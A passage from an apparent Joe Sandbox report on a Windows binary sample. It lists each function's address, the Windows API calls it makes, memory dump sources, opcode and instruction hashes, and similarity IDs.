                                                                                        • Opcode Fuzzy Hash: bc54b56a65aef8494da8c956cd9fface9105ad9632f5fa74b19ba6cf7399c84b
                                                                                        • Instruction Fuzzy Hash: 87E06572504650EFCB129B5DDC06B45FBACFB4DB20F044266F416D3760CB747800CA90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,0036A23A,?,0036755C,?,?,?,?), ref: 0036A254
                                                                                          • Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27
                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0036A23A,?,0036755C,?,?,?,?), ref: 0036A280
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile$_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2673547680-0
                                                                                        • Opcode ID: fc0414aa155cf0d9e13d1b699927ea646ce2723ae54ea937e6b740c4eef2646b
                                                                                        • Instruction ID: 05c072e5270a6f92ef7167b9af5240e5b6eeb23deb3e9d05c083ca8145ae3ec2
                                                                                        • Opcode Fuzzy Hash: fc0414aa155cf0d9e13d1b699927ea646ce2723ae54ea937e6b740c4eef2646b
                                                                                        • Instruction Fuzzy Hash: EEE092755001245BCB22AB64CC05BD9B75CAB083E1F048661FD55E7294D771DE84CAA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _swprintf.LIBCMT ref: 0037DEEC
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                        • SetDlgItemTextW.USER32(00000065,?), ref: 0037DF03
                                                                                          • Part of subcall function 0037B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
                                                                                          • Part of subcall function 0037B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
                                                                                          • Part of subcall function 0037B568: IsDialogMessageW.USER32(00010420,?), ref: 0037B59E
                                                                                          • Part of subcall function 0037B568: TranslateMessage.USER32(?), ref: 0037B5AC
                                                                                          • Part of subcall function 0037B568: DispatchMessageW.USER32(?), ref: 0037B5B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2718869927-0
                                                                                        • Opcode ID: eb116adfff6e6b9769d125523d3d0f8eb343cb4457673f1c3f23aaeb725462f6
                                                                                        • Instruction ID: 3f7af4a7594b68f9a0cc47c354924d630004372ecd4bdfa210694e943d005ff8
                                                                                        • Opcode Fuzzy Hash: eb116adfff6e6b9769d125523d3d0f8eb343cb4457673f1c3f23aaeb725462f6
                                                                                        • Instruction Fuzzy Hash: 83E092B64002486ADF13BB65DC0AFDE3B6C5B0A789F048851B244DE0A2EA78EA108761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
                                                                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryLibraryLoadSystem
                                                                                        • String ID:
                                                                                        • API String ID: 1175261203-0
                                                                                        • Opcode ID: c7d168612bfed8e71536ad8091bfe59124959445d3ca07a239b7389a3e81a596
                                                                                        • Instruction ID: 686b63710b6f57fac7cefc771747b71d8dc7b6aae18b1ededbc5334c64126bd1
                                                                                        • Opcode Fuzzy Hash: c7d168612bfed8e71536ad8091bfe59124959445d3ca07a239b7389a3e81a596
                                                                                        • Instruction Fuzzy Hash: F1E048B64001187BDB12AB94DC09FDB77ACEF0D3D1F044066B649D6104D674DA84CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0037A3DA
                                                                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0037A3E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: BitmapCreateFromGdipStream
                                                                                        • String ID:
                                                                                        • API String ID: 1918208029-0
                                                                                        • Opcode ID: bd0e35063bb2a736f73462d64e868febf5d03cdeecf78452ed734b10205078f8
                                                                                        • Instruction ID: a6c84e2803e519dc82ee7bb83ed93890e2fc68e85bf49e1cb82ec5551a2e9f50
                                                                                        • Opcode Fuzzy Hash: bd0e35063bb2a736f73462d64e868febf5d03cdeecf78452ed734b10205078f8
                                                                                        • Instruction Fuzzy Hash: A8E01275504218EFDB21DF95C541B9DBBF8EF08364F10C05AE89A97201E378AE04DB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00382B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00382BAA
                                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00382BB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                        • String ID:
                                                                                        • API String ID: 1660781231-0
                                                                                        • Opcode ID: ac8e0d07045ccb45e858a397e7496c85273d71a94bda3a8985d0ffcc6b6427bf
                                                                                        • Instruction ID: 5c5042bea5b9c8a7e846932b408a099aa63517fe796fb6499062721784d0556b
                                                                                        • Opcode Fuzzy Hash: ac8e0d07045ccb45e858a397e7496c85273d71a94bda3a8985d0ffcc6b6427bf
                                                                                        • Instruction Fuzzy Hash: 7DD02235156300188C1B7EB028039CB3789AD41F70BB146CBF821CD9C1EE218480A312
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003612F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3351165006-0
                                                                                        • Opcode ID: 18a2b8b2c92308372309e699275f283974084e686cae41f9e679ea77ac319547
                                                                                        • Instruction ID: 642534c231ee3f0fab6cfc6a81c90395f597a8a9220eb5780168e8c42d73efbe
                                                                                        • Opcode Fuzzy Hash: 18a2b8b2c92308372309e699275f283974084e686cae41f9e679ea77ac319547
                                                                                        • Instruction Fuzzy Hash: E6C0127209C200BECB022BB4DC09C2BBBBCEBA5312F08C908B0A5C0060C238C110DB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00361A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 1dc9ea1d7ed27714ae86ad3ebf542d76b36c0d2b2e79f978ac3c56833697bf98
                                                                                        • Instruction ID: df4eeaec943d2c50888295dd44a8a6af745ebc6465786adfe31da15cd7fcb09f
                                                                                        • Opcode Fuzzy Hash: 1dc9ea1d7ed27714ae86ad3ebf542d76b36c0d2b2e79f978ac3c56833697bf98
                                                                                        • Instruction Fuzzy Hash: AAC1BF70A002549FEF16CF68C488BBD7BA5AF05310F0D81BAEC469F39ADB719944CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00363BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: d3e6cc49c7246e402de514277918fef99d07c9065b2845cfb4e532bcfbd681f7
                                                                                        • Instruction ID: 852ee0792818c39739f6b608c5cd88da2ab3cf2109ddbce3a56f3cd1cd73d1f1
                                                                                        • Opcode Fuzzy Hash: d3e6cc49c7246e402de514277918fef99d07c9065b2845cfb4e532bcfbd681f7
                                                                                        • Instruction Fuzzy Hash: 5F71D271500F449EDB37DB70C8519E7B7E9AF14301F41892EF2AB8B246DA326A84DF21
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00368284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00368289
                                                                                          • Part of subcall function 003613DC: __EH_prolog.LIBCMT ref: 003613E1
                                                                                          • Part of subcall function 0036A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0036A598
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog$CloseFind
                                                                                        • String ID:
                                                                                        • API String ID: 2506663941-0
                                                                                        • Opcode ID: f60a674df379ed605b402744228b9177c99033c6f27347d82b2844de0f3d94be
                                                                                        • Instruction ID: f44fe1f63c69049e6983b60d91df743f6d167ef8fb38bcc620dca63c61033cd8
                                                                                        • Opcode Fuzzy Hash: f60a674df379ed605b402744228b9177c99033c6f27347d82b2844de0f3d94be
                                                                                        • Instruction Fuzzy Hash: 8D41F9759046589ADB32DB60CC55BEAB3B8AF04304F0485EBE08A9B187EF755FC4CB10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003613E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 003613E1
                                                                                          • Part of subcall function 00365E37: __EH_prolog.LIBCMT ref: 00365E3C
                                                                                          • Part of subcall function 0036CE40: __EH_prolog.LIBCMT ref: 0036CE45
                                                                                          • Part of subcall function 0036B505: __EH_prolog.LIBCMT ref: 0036B50A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 3ef48f2cdef3079436f6cfcb961bd896b86c782ba8fdde7118bdbe8c95abeb61
                                                                                        • Instruction ID: 3acfd6a2745849b09fef22d5d01869db45419aff3e366f8a58279248eae3f2db
                                                                                        • Opcode Fuzzy Hash: 3ef48f2cdef3079436f6cfcb961bd896b86c782ba8fdde7118bdbe8c95abeb61
                                                                                        • Instruction Fuzzy Hash: 794148B0905B409EE725CF398885AE6FBE5BF19300F54892ED5EF87282CB316654CB10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003613DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 003613E1
                                                                                          • Part of subcall function 00365E37: __EH_prolog.LIBCMT ref: 00365E3C
                                                                                          • Part of subcall function 0036CE40: __EH_prolog.LIBCMT ref: 0036CE45
                                                                                          • Part of subcall function 0036B505: __EH_prolog.LIBCMT ref: 0036B50A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 17831fd5d696c747444baf772eab4ad589b0f5f03abcb64360ff7d07a9cb0a5b
                                                                                        • Instruction ID: b902abae1458b831d1f99f5a919e3fedcf95c50d946535c222eb6fd1b12b20e8
                                                                                        • Opcode Fuzzy Hash: 17831fd5d696c747444baf772eab4ad589b0f5f03abcb64360ff7d07a9cb0a5b
                                                                                        • Instruction Fuzzy Hash: 384167B0905B409EE725CF398885AE6FBE5BF19300F54892ED5FF87282CB326654CB10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 5dbcd4a9e7ad51b2cc7776270253be7bb74233040ea968fc1758fa51cd5de0a3
                                                                                        • Instruction ID: 5c3ffb67e4e71fff4907c4c92635e3db2d1f0c760519c60b9522eca0bdc6aa43
                                                                                        • Opcode Fuzzy Hash: 5dbcd4a9e7ad51b2cc7776270253be7bb74233040ea968fc1758fa51cd5de0a3
                                                                                        • Instruction Fuzzy Hash: F321F8B5E40211AFDB259F74CC4165B77A8FB19314F01853EE509EB781D7789A00C7E8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 0037B098
                                                                                          • Part of subcall function 003613DC: __EH_prolog.LIBCMT ref: 003613E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 3e0e7fcfdcd039466d75799f58e918180c42e19ecb658881be38d0a1777eed46
                                                                                        • Instruction ID: 62f1c4d7fb7931f6a0e5ef5785234b0ae3768f064c157b6f9b0bc25664ef7933
                                                                                        • Opcode Fuzzy Hash: 3e0e7fcfdcd039466d75799f58e918180c42e19ecb658881be38d0a1777eed46
                                                                                        • Instruction Fuzzy Hash: F6318F75C04249DFCF26DF64C851AEEBBB4AF09304F54849EE409BB242DB39AE04CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0038ACF8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID:
                                                                                        • API String ID: 190572456-0
                                                                                        • Opcode ID: fd41563d04ced54748e9d8539b38fd257ef8926d7a4ffaeb9c15b698923cd087
                                                                                        • Instruction ID: 068b0710dbe4751864673055225037762e607bc6dcac7a6dd2e94d1522d9cc6c
                                                                                        • Opcode Fuzzy Hash: fd41563d04ced54748e9d8539b38fd257ef8926d7a4ffaeb9c15b698923cd087
                                                                                        • Instruction Fuzzy Hash: CB110A33600B255FBB23EE28DC5095A73ADAB84720B1741A2FD15EB654D731EC0187D2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00369215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
